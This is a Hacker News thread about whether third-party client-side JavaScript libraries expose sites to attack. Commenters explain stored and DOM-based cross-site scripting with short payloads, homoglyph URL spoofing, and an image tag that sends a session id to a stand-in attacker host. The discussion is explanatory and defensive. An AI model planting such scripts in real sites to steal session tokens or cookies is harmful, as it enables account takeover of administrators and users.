Hacker News new | ask | show | jobs
by scandox 3387 days ago
I'd like to see some practical examples of exploited vulnerabilities in client side JS libraries. I always think of everything client side as happening in a context of total insecurity- in the sense that I make no assumptions of what the client will do in relation to the server.

Is this more about libraries that expose the client to attacks from code on other sites?

Perhaps I'm complacent about this but I often think of this as the responsibility of the browser...
2 comments
Rapzid 3387 days ago
Your users aren't authorized to carry out actions on the server? There is no information in your front end that should remain secret to you and the user?
link
scandox 3387 days ago
Indeed there is. Most often a token, stored in localStorage. But that token can be used from anywhere and with any mechanism. So I guess what I mean is that if there is a way for somebody to intercept or retrieve it, then I have in the past viewed that as a vulnerability of the browser (probably wrongly).

So what I'd love to understand better is the kind of attacks that would be practical, and how they would exploit a 3rd party library.

By the way I am totally receptive to the possibility that there may be grave vulnerabilities. I just don't have the kind of mind that easily thinks of them.

Edited: for clarity

link
jamiesonbecker 3387 days ago
Your humility is pretty awesome.

As a simple example, paste <script>alert("haha")</script> into an form in your system that will (eventually) be viewable to someone else. Let's say it's something innocuous like the quantity field on an order form or a comment on a comment form.

Now, none of those characters will attack your database through SQL injection, right? So what happens when you (the administrator) views your latest orders? Basically, that javascript is now operating in the security context of you, the administrator, not in the context of the attacker that submitted it. It could do something worse than alert()... for example, it could grab your session token or a cookie's secret value (depending on the cookie) and send it off to <img src=evilattacker.xyz/clear.gif?sid=xxxx>, and now the attacker can become you.

Or, it could do the same thing to another user on your forum when they look at the evil comment.

This sort of attack is easy to do and broadly considered XSS (cross-site scripting). There are related areas of attack, like cookie forgery, referral, etc attacks. The OWASP string replacement guidelines (or my safify.js) can help with this, but ultimately string sanitation has to make sense for the context (i.e., browser bad characters are different from SQL injection bad characters).

And, you have to think about the weakest link... us poor humans, to whom similar π–»π—Žπ— π—‡π—ˆπ— π—Šπ—Žπ—‚π—π–Ύ 𝗍𝗁𝖾 π—Œπ–Ίπ—†π–Ύ π—Žπ—‡π—‚π–Όπ—ˆπ–½π–Ύ π—…π–Ύπ—π—π–Ύπ—‹π—Œ 𝖼𝖺𝗇 𝖻𝖾 π—Žπ—Œπ–Ύπ–½ π—π—ˆ 𝗍𝗋𝗂𝖼𝗄 π—Œπ—ˆπ—†π–Ύπ—ˆπ—‡π–Ύ... 𝗆𝖺𝗒𝖻𝖾 𝗍𝗁𝖾𝗒 𝗍𝗁𝗂𝗇𝗄 𝗂𝗍'π—Œ 𝖺 𝖽𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍 𝖴𝖱𝖫 𝗍𝗁𝖺𝗇 𝗂𝗍 π—‚π—Œ, π—ˆπ—‹ 𝖺 𝖽𝗂𝖿𝖿𝖾𝗋𝖾𝗇𝗍 π—Žπ—Œπ–Ύπ—‹π—‡π–Ίπ—†π–Ύ.. (paste that into vim to see the actual characters in the preceding sentence.)

    π—π—π—π—‰π—Œ://π—€π—ˆπ—ˆπ—€π—…π–Ύ.π–Όπ—ˆπ—†/?π—Š=π—‡π—ˆπ—+𝗐𝗁𝖺𝗍+π—’π—ˆπ—Ž+𝗍𝗁𝗂𝗇𝗄
None of those unicode characters will usually trigger any blacklists, but because it "looks" right, sometimes can even trick security-aware hackers. (see also punycode). What if someone spoofs someone's username on github?

There's lots and lots of interesting ways to attack websites. It's tough to keep track of them all.

Another example. Your 404 page..

    <h1>404</h1>
    <p>Sorry, /x/y/z doesn't exist.</p>
Now, someone says "Hey, can you please visit this site?"

https://yoursite.com/this-is-a-long-url-thats-hidden-in-a-an...

link
scandox 3387 days ago
Humility is all I've got :)
link
olalonde 3387 days ago
https://en.wikipedia.org/wiki/Cross-site_scripting is a big one.
link
ng12 3387 days ago
But I don't think jQuery vulnerabilities could possibly open you up to XSS attacks unless you were already doing something silly.
link
jamiesonbecker 3387 days ago
something like..

    var comment = "<script>alert(1)</script>";
    $("div.comments").append(comment);
not so silly.
link
ng12 3387 days ago
It is silly if the content of `comment` is coming from an external source (e.g. query string). Could you identify a specific jQuery vulnerability that makes otherwise safe code unsafe?
link
et-al 3387 days ago
This example will only affect that particular user viewing the page, though. And once they hit refresh, that'll be gone.

If I'm following your other example with malicious input into a form; the snippet would have to pass server-side validation (likely, since it's probably checking for SQL injects). Then past that, when it gets rendered for other users, the view/templating would need to display the snippet as a script instead of just text, right?

link
mi100hael 3387 days ago
Ever heard of XSS?
link
scandox 3387 days ago
Yes but what I think I had not given enough thought to were DOM-based vulnerabilities, which it seems to me are the ones that would be relevant to 3rd party JS libs. Anyway I will certainly be giving this deeper thought.
link
steveax 3387 days ago
If you're for instance relying on handlebars to escape displayed content from user input properly and your version has a vulnerability...
link